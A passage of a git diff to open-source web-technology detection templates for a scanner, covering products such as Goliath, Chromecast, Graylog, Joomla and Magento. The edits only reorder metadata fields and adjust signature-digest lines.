490a0046304402200a32d522f5f00075eeeb3eb54bfad76315399d4ab6d356ad8788a0493e91601a022040a04b8cbbbd7f4c21319181ae9e3c1ae7e92d9cf1933397a89112eb2d6a7dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml index 39265f0951..fca84900cc 100644 --- a/http/technologies/goliath-detect.yaml +++ b/http/technologies/goliath-detect.yaml @@ -8,16 +8,16 @@ info: Goliath is a non-blocking Ruby web server framework reference: - https://github.com/postrank-labs/goliath + classification: + cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:* metadata: verified: true max-request: 1 - shodan-query: 'Server: Goliath' - product: goliath vendor: goliath_project + product: goliath + shodan-query: 'Server: Goliath' tags: tech,goliath - classification: - cpe: cpe:2.3:a:goliath_project:goliath:*:*:*:*:ruby:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: kval: - Server -# digest: 4a0a00473045022054f67669656a1ce1e97dc9462e2d19eb164aabeb16375e09052d83d000fcec0f022100e55c1cc61413ecbb93ee9c3fcc12eccc16a34bcef60cf8b13eda0e2cc74feb19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022054f67669656a1ce1e97dc9462e2d19eb164aabeb16375e09052d83d000fcec0f022100e55c1cc61413ecbb93ee9c3fcc12eccc16a34bcef60cf8b13eda0e2cc74feb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/google/chromecast-detect.yaml b/http/technologies/google/chromecast-detect.yaml index 429c6325ca..3d4ad6a029 100644 --- a/http/technologies/google/chromecast-detect.yaml +++ b/http/technologies/google/chromecast-detect.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43 - https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication + classification: + cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: Chromecast - product: chromecast vendor: google + product: chromecast + shodan-query: Chromecast tags: google,chromecast,detect - classification: - cpe: cpe:2.3:h:google:chromecast:*:*:*:*:*:*:*:* http: - raw: - | @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml index 9359e52316..accc4ad5a8 100644 --- a/http/technologies/graylog/graylog-api-exposure.yaml +++ b/http/technologies/graylog/graylog-api-exposure.yaml @@ -9,16 +9,16 @@ info: reference: - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd + classification: + cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* metadata: verified: true max-request: 50 - shodan-query: Graylog - product: graylog vendor: graylog + product: graylog + shodan-query: Graylog tags: tech,graylog,api,swagger,fuzz - classification: - cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* http: - method: GET path: @@ -92,4 +92,5 @@ http: - "status_code == 401" - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" condition: and -# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/hugo-detect.yaml b/http/technologies/hugo-detect.yaml index aa38c4b59f..277f717c2c 100644 --- a/http/technologies/hugo-detect.yaml +++ b/http/technologies/hugo-detect.yaml @@ -5,16 +5,16 @@ info: author: daffainfo severity: info description: Hugo is a fast and modern static site generator written in Go + classification: + cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:'Hugo' - product: hugo vendor: gohugo + product: hugo + shodan-query: http.html:'Hugo' tags: tech,hugo - classification: - cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: regex: - '(?m)' -# digest: 490a004630440220603d57b1e53b35e6fec9364e65fed4928f3cea3292df4b644e176e36f21c514f02202dc3bd56e238afeb499095eb01af05edb802a66548c6d26d7c1e42a2ec11bd58:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220603d57b1e53b35e6fec9364e65fed4928f3cea3292df4b644e176e36f21c514f02202dc3bd56e238afeb499095eb01af05edb802a66548c6d26d7c1e42a2ec11bd58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ibm/ibm-http-server.yaml b/http/technologies/ibm/ibm-http-server.yaml index 0ac7c08c97..22c9abca69 100644 --- a/http/technologies/ibm/ibm-http-server.yaml +++ b/http/technologies/ibm/ibm-http-server.yaml @@ -4,15 +4,15 @@ info: name: Default IBM HTTP Server author: dhiyaneshDK,pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: http.title:"IBM-HTTP-Server" - product: http_server - vendor: ibm - tags: tech,ibm - classification: cpe: cpe:2.3:a:ibm:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ibm + product: http_server + shodan-query: http.title:"IBM-HTTP-Server" + tags: tech,ibm + http: - method: GET path: @@ -34,4 +34,4 @@ http: regex: - "IBM HTTP Server ([0-9.]+)" -# digest: 490a0046304402206e7b93e6a0825caae64cc217d69555968c6a3c2f32b6ce510d8ec2a5176d7a24022023980a3da37a7b24368f2d66d5744390c5d0156788e4025b626e2972a9032f38:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206e7b93e6a0825caae64cc217d69555968c6a3c2f32b6ce510d8ec2a5176d7a24022023980a3da37a7b24368f2d66d5744390c5d0156788e4025b626e2972a9032f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ibm/ibm-odm-detect.yaml b/http/technologies/ibm/ibm-odm-detect.yaml index e3ba3b6deb..6facd30c24 100644 --- a/http/technologies/ibm/ibm-odm-detect.yaml +++ b/http/technologies/ibm/ibm-odm-detect.yaml @@ -8,16 +8,16 @@ info: IBM Operational Decision Manager was detected. reference: - https://www.ibm.com/products/operational-decision-manager + classification: + cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: "icon_hash=\"707491698\"" - product: operational_decision_manager vendor: ibm + product: operational_decision_manager + fofa-query: "icon_hash=\"707491698\"" tags: ibm,decision-center,tech,detect - classification: - cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/icecast-server-detect.yaml b/http/technologies/icecast-server-detect.yaml index 6dfb743b07..60b7f79de8 100644 --- a/http/technologies/icecast-server-detect.yaml +++ b/http/technologies/icecast-server-detect.yaml @@ -4,16 +4,16 @@ info: name: Icecast Streaming Media Server Detection author: theamanrawat severity: info + classification: + cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Icecast Streaming Media Server" - product: icecast vendor: xiph + product: icecast + shodan-query: http.title:"Icecast Streaming Media Server" tags: tech,icecast - classification: - cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 4a0a0047304502204c630892412361b46b4fb74c2907df0b0eca95d61b5ebbfd75fc640367d9a5a3022100ff05a34447848b253688f47fdcad9df12af6abe0a6faba88a238ffe59acd9ad6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204c630892412361b46b4fb74c2907df0b0eca95d61b5ebbfd75fc640367d9a5a3022100ff05a34447848b253688f47fdcad9df12af6abe0a6faba88a238ffe59acd9ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/identity-server-v3-detect.yaml b/http/technologies/identity-server-v3-detect.yaml index 3a196983fe..9d38aac22e 100644 --- a/http/technologies/identity-server-v3-detect.yaml +++ b/http/technologies/identity-server-v3-detect.yaml @@ -8,16 +8,16 @@ info: Identity Server V3 technology was detected. reference: - https://identityserver.github.io/Documentation/ + classification: + cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"IdentityServer v3" - product: identity_server vendor: wso2 + product: identity_server + shodan-query: http.title:"IdentityServer v3" tags: tech,identityserver,detect - classification: - cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,7 +25,6 @@ http: host-redirects: true max-redirects: 2 - matchers: - type: dsl dsl: @@ -39,4 +38,5 @@ http: group: 1 regex: - '(?i)build\s+([a-z0-9.-]+)' -# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index b3ab6ec590..a791511045 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -8,16 +8,16 @@ info: imgproxy is a fast and secure standalone server for resizing, processing, and converting images. reference: - https://imgproxy.net/ + classification: + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"imgproxy" - product: imgproxy vendor: evilmartians + product: imgproxy + shodan-query: html:"imgproxy" tags: imgproxy,tech,detect - classification: - cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains(server, "imgproxy")' condition: and -# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/interactsh-server.yaml b/http/technologies/interactsh-server.yaml index 4e35480ef1..03b3b9a691 100644 --- a/http/technologies/interactsh-server.yaml +++ b/http/technologies/interactsh-server.yaml @@ -4,16 +4,16 @@ info: name: Interactsh Server author: pdteam severity: info + classification: + cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Interactsh Server" - product: interactsh vendor: projectdiscovery + product: interactsh + shodan-query: http.html:"Interactsh Server" tags: tech,interactsh - classification: - cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: - '(.*)<\/b> server' - 'from (.*)<\/b>' -# digest: 4a0a00473045022023737e1314fc6dd3f91d1976e2f3fa59649ee694a17fbbf5f3e76b0f653aee47022100b2d374fd707bd73c49c443354dfca7eb684339384d5631dcbd25098e20890ec3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022023737e1314fc6dd3f91d1976e2f3fa59649ee694a17fbbf5f3e76b0f653aee47022100b2d374fd707bd73c49c443354dfca7eb684339384d5631dcbd25098e20890ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ispyconnect-detect.yaml b/http/technologies/ispyconnect-detect.yaml index af83519262..a68b06c5c7 100644 --- a/http/technologies/ispyconnect-detect.yaml +++ b/http/technologies/ispyconnect-detect.yaml @@ -4,16 +4,16 @@ info: name: iSpyConnect - Detect author: arafatansari severity: info + classification: + cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"iSpy" - product: ispy vendor: ispyconnect + product: ispy + shodan-query: http.html:"iSpy" tags: tech,ispy - classification: - cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: words: - 'Server: iSpy' -# digest: 4a0a0047304502210086f9addf2070354a0b68754784b5e4ea7c8916953952ab1f1554da34155d0a3d02201d2e299895ec3a85e134c9f57a8175a63cb852a1d1a4b2b894b6ed65f1c8358a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210086f9addf2070354a0b68754784b5e4ea7c8916953952ab1f1554da34155d0a3d02201d2e299895ec3a85e134c9f57a8175a63cb852a1d1a4b2b894b6ed65f1c8358a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/jeecg-boot-detect.yaml b/http/technologies/jeecg-boot-detect.yaml index 6d6f5bba6b..ac85477540 100644 --- a/http/technologies/jeecg-boot-detect.yaml +++ b/http/technologies/jeecg-boot-detect.yaml @@ -6,15 +6,15 @@ info: severity: info reference: - http://www.jeecg.com/ - metadata: - max-request: 2 - fofa-query: title="Jeecg-Boot" - product: jeecg_boot - vendor: jeecg - tags: jeecg-boot,tech - classification: cpe: cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: jeecg + product: jeecg_boot + fofa-query: title="Jeecg-Boot" + tags: jeecg-boot,tech + http: - method: GET path: @@ -30,4 +30,4 @@ http: words: - "Jeecg-Boot" -# digest: 490a00463044022001a31aa66fe94e9217ab94ec8b12b379debf3f8e31956d78e0eb23606ac1cc9202202e69fbd4553fed114ef2923d7e9d769f8f8b75a57adc610b43f5dd29914e690d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001a31aa66fe94e9217ab94ec8b12b379debf3f8e31956d78e0eb23606ac1cc9202202e69fbd4553fed114ef2923d7e9d769f8f8b75a57adc610b43f5dd29914e690d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/jellyfin-detect.yaml b/http/technologies/jellyfin-detect.yaml index 472f23f5f1..62b5a4bd71 100644 --- a/http/technologies/jellyfin-detect.yaml +++ b/http/technologies/jellyfin-detect.yaml @@ -4,16 +4,16 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + classification: + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 - shodan-query: http.html:"Jellyfin" - product: jellyfin vendor: jellyfin + product: jellyfin + shodan-query: http.html:"Jellyfin" tags: tech,jellyfin - classification: - cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e7945c18c896fbc9d6dc22f9501ee24fc722cbdf0a93c829a334d41f17236e53022100dbf14f47f4d04693cdbbc12091ef6dc5e1d07f7355e964288fa6ab9b0a1c8690:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e7945c18c896fbc9d6dc22f9501ee24fc722cbdf0a93c829a334d41f17236e53022100dbf14f47f4d04693cdbbc12091ef6dc5e1d07f7355e964288fa6ab9b0a1c8690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/jhipster-detect.yaml b/http/technologies/jhipster-detect.yaml index db13819701..b1220b6072 100644 --- a/http/technologies/jhipster-detect.yaml +++ b/http/technologies/jhipster-detect.yaml @@ -4,16 +4,16 @@ info: name: JHipster Detect author: righettod severity: info + classification: + cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.html:"JHipster" - product: jhipster vendor: jhipster + product: jhipster + shodan-query: http.html:"JHipster" tags: tech,jhipster - classification: - cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: - 'jhipster-error' condition: or -# digest: 490a0046304402207fb03d0951d123f967236cdd360ae10573cd25a48cbc198d3bfe950daa880b8202204f56e01b491e079da057224b5d092059d35aadd2e10bbb00cd07204c073b522e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207fb03d0951d123f967236cdd360ae10573cd25a48cbc198d3bfe950daa880b8202204f56e01b491e079da057224b5d092059d35aadd2e10bbb00cd07204c073b522e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/jitsi-meet-detect.yaml b/http/technologies/jitsi-meet-detect.yaml index 5517df9adb..3e6297d266 100644 --- a/http/technologies/jitsi-meet-detect.yaml +++ b/http/technologies/jitsi-meet-detect.yaml @@ -4,15 +4,15 @@ info: name: Jitsi Meet Page Detect author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Jitsi Meet" - product: meet - vendor: jitsi - tags: tech,jitsi - classification: cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:docker:*:*:* + metadata: + max-request: 1 + vendor: jitsi + product: meet + shodan-query: http.title:"Jitsi Meet" + tags: tech,jitsi + http: - method: GET path: @@ -29,4 +29,4 @@ http: status: - 200 -# digest: 4b0a004830460221009463dfd7edff4d388faf7f4a580e512ccf90e8da4814a402e4fa26a137e42028022100b3f10bef6688780ac4c20a1b042eb013ca017bba8ea5f0492188ded27ced3835:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009463dfd7edff4d388faf7f4a580e512ccf90e8da4814a402e4fa26a137e42028022100b3f10bef6688780ac4c20a1b042eb013ca017bba8ea5f0492188ded27ced3835:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml index 54aaf6f94e..606da81585 100644 --- a/http/technologies/joomla-detect.yaml +++ b/http/technologies/joomla-detect.yaml @@ -11,16 +11,16 @@ info: - https://github.com/joomla/joomla-cms - https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website - https://hackertarget.com/attacking-enumerating-joomla/ + classification: + cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 - google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer" - product: joomla\\! vendor: joomla + product: joomla\\! + google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer" tags: tech,joomla,cms,oss - classification: - cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -60,4 +60,4 @@ http: - '(?i)Joomla_([\d.|\d]+)_version_history' part: body -# digest: 4b0a00483046022100b98eef55dbf7bc0eb9c31e6dfaf23c8061227bec12c392230d6a4fa341e6672f022100d83e9c47d57d481a2d6e772b3c7defc5dff5f125e045297c49d70c85c7616200:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b98eef55dbf7bc0eb9c31e6dfaf23c8061227bec12c392230d6a4fa341e6672f022100d83e9c47d57d481a2d6e772b3c7defc5dff5f125e045297c49d70c85c7616200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/kodexplorer-detect.yaml b/http/technologies/kodexplorer-detect.yaml index d856052790..95cadaf7ff 100644 --- a/http/technologies/kodexplorer-detect.yaml +++ b/http/technologies/kodexplorer-detect.yaml @@ -4,15 +4,15 @@ info: name: KodExplorer-detect author: ffffffff0x severity: info - metadata: - max-request: 1 - fofa-query: app="Powered-by-KodExplorer" - product: kodexplorer - vendor: kodcloud - tags: kodexplorer,tech - classification: cpe: cpe:2.3:a:kodcloud:kodexplorer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kodcloud + product: kodexplorer + fofa-query: app="Powered-by-KodExplorer" + tags: kodexplorer,tech + http: - method: GET path: @@ -33,4 +33,4 @@ http: regex: - 'Powered by KodExplorer ([a-z0-9.]+) \|' -# digest: 4a0a0047304502204de33e8a5b1cbb263d5cfbea0b14b7bfa5db83f2dd5a4294642ed20d0122bf2c0221009469d28eea0b8658f626256c905cd44f5a1b7d54c790613f38c5131f7fc25697:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204de33e8a5b1cbb263d5cfbea0b14b7bfa5db83f2dd5a4294642ed20d0122bf2c0221009469d28eea0b8658f626256c905cd44f5a1b7d54c790613f38c5131f7fc25697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/landesk/landesk-ma.yaml b/http/technologies/landesk/landesk-ma.yaml index f290195513..7355f4eb0c 100644 --- a/http/technologies/landesk/landesk-ma.yaml +++ b/http/technologies/landesk/landesk-ma.yaml @@ -4,16 +4,16 @@ info: name: LANDESK(R) Management Agent Detect author: 0xNirvana severity: info + classification: + cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"LANDESK(R)" - product: landesk_management_suite vendor: landesk + product: landesk_management_suite + shodan-query: http.html:"LANDESK(R)" tags: tech,landesk - classification: - cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +27,4 @@ http: - "Management Agent" condition: and -# digest: 4a0a00473045022100d388e76b1f498ed9cb53dc45ec6b1e2d5788b4b584cddcc0958ac1570d004e0e02202700c461d43a60cc645dd7e0de36e8c209cccfa10ea427e603ee2bd16d4a17d2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d388e76b1f498ed9cb53dc45ec6b1e2d5788b4b584cddcc0958ac1570d004e0e02202700c461d43a60cc645dd7e0de36e8c209cccfa10ea427e603ee2bd16d4a17d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/limesurvey-detect.yaml b/http/technologies/limesurvey-detect.yaml index 1ca5a1ada7..9e3f757646 100644 --- a/http/technologies/limesurvey-detect.yaml +++ b/http/technologies/limesurvey-detect.yaml @@ -8,16 +8,16 @@ info: Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation. reference: - https://github.com/LimeSurvey/LimeSurvey + classification: + cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:1781653957 - product: limesurvey vendor: limesurvey + product: limesurvey + shodan-query: http.favicon.hash:1781653957 tags: tech,limesurvey - classification: - cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,4 @@ http: status: - 200 -# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/livehelperchat-detect.yaml b/http/technologies/livehelperchat-detect.yaml index 309d2c64de..0b27b5c76b 100644 --- a/http/technologies/livehelperchat-detect.yaml +++ b/http/technologies/livehelperchat-detect.yaml @@ -4,16 +4,16 @@ info: name: Live Helper Chat Detect author: pikpikcu,ricardomaia severity: info + classification: + cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - fofa-query: title="Live Helper Chat" - product: live_helper_chat vendor: livehelperchat + product: live_helper_chat + fofa-query: title="Live Helper Chat" tags: livehelperchat,tech - classification: - cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +44,4 @@ http: regex: - '^(?i)((\d+\.)?(\d+\.)?(\*|\d+))v' -# digest: 4a0a00473045022100d5459e39f5cdcc99770a5a997226fb3010e57b39602036f86330f86c9f210f1c022058c72da4e91f93fd6131cea8db8e0d9768bf75cbaa5d5083e4ed82f560609f5f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d5459e39f5cdcc99770a5a997226fb3010e57b39602036f86330f86c9f210f1c022058c72da4e91f93fd6131cea8db8e0d9768bf75cbaa5d5083e4ed82f560609f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml index 16e2a0fa34..44991bf700 100644 --- a/http/technologies/magento-detect.yaml +++ b/http/technologies/magento-detect.yaml @@ -7,16 +7,16 @@ info: description: Identify Magento reference: - https://devdocs.magento.com/guides/v2.4/graphql/ + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.component:"Magento" - product: magento vendor: magento + product: magento + shodan-query: http.component:"Magento" tags: magento,tech - classification: - cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: - 'status_code == 200' condition: and -# digest: 4a0a00473045022100d656eabddfff334ac0812c786782c0d7542971ca5873ac77407bb0fefada44bb0220299ba7fbf186ff6fa0a027db9e9b7195c197821775520ae435aa8926996334f0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d656eabddfff334ac0812c786782c0d7542971ca5873ac77407bb0fefada44bb0220299ba7fbf186ff6fa0a027db9e9b7195c197821775520ae435aa8926996334f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/magmi-detect.yaml b/http/technologies/magmi-detect.yaml index 82cb864148..64f3b642ec 100644 --- a/http/technologies/magmi-detect.yaml +++ b/http/technologies/magmi-detect.yaml @@ -4,16 +4,16 @@ info: name: MAGMI (Magento Mass Importer) Plugin Detect author: dwisiswant0 severity: info + classification: + cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.component:"Magento" - product: magmi vendor: magmi_project + product: magmi + shodan-query: http.component:"Magento" tags: magento,magmi,plugin,tech - classification: - cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 490a0046304402200acdc7f786b8e096fd058e601526668418183ee1b87f56230379078322fc28700220599161d4f1f996d3545747f730c3465aedc42bfc25a40499617490737d1b3ad7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200acdc7f786b8e096fd058e601526668418183ee1b87f56230379078322fc28700220599161d4f1f996d3545747f730c3465aedc42bfc25a40499617490737d1b3ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/matrix-homeserver-detect.yaml b/http/technologies/matrix-homeserver-detect.yaml index 06a4821e03..e6131ba93c 100644 --- a/http/technologies/matrix-homeserver-detect.yaml +++ b/http/technologies/matrix-homeserver-detect.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Extract the Matrix homeserver name and version + classification: + cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Synapse is running" - product: synapse vendor: matrix + product: synapse + shodan-query: title:"Synapse is running" tags: tech,matrix,synapse - classification: - cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -23,7 +23,6 @@ http: redirects: true max-redirects: 2 - matchers: - type: word part: body @@ -38,4 +37,5 @@ http: part: body json: - '.server | select((.name != null) and (.version != null)) | .name, .version' -# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microsoft-iis-8.yaml b/http/technologies/microsoft-iis-8.yaml index ac4bc4124a..758121531c 100644 --- a/http/technologies/microsoft-iis-8.yaml +++ 